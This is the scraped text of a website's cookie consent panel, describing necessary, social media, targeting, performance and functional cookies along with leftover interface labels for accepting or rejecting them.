However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All


MANAGE CONSENT PREFERENCES

STRICTLY NECESSARY COOKIES

Always Active

These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to block
or alert you about these cookies, but some parts of the site will not then work.
These cookies do not store any personally identifiable information.

Cookies Details‎

SOCIAL MEDIA COOKIES

Social Media Cookies

These cookies are set by a range of social media services that we have added to
the site to enable you to share our content with your friends and networks. They
are capable of tracking your browser across other sites and building up a
profile of your interests. This may impact the content and messages you see on
other websites you visit. If you do not allow these cookies you may not be able
to use or see these sharing tools.

Cookies Details‎

TARGETING COOKIES

Targeting Cookies

These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.

Cookies Details‎

PERFORMANCE COOKIES

Performance Cookies

These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.

Cookies Details‎

FUNCTIONAL COOKIES

Functional Cookies

These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.

Cookies Details‎
Back Button


PERFORMANCE COOKIES



Search Icon
Filter Icon

Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label

 * 
   
   View Cookies
   
    * Name
      cookie name

Reject All Confirm My Choices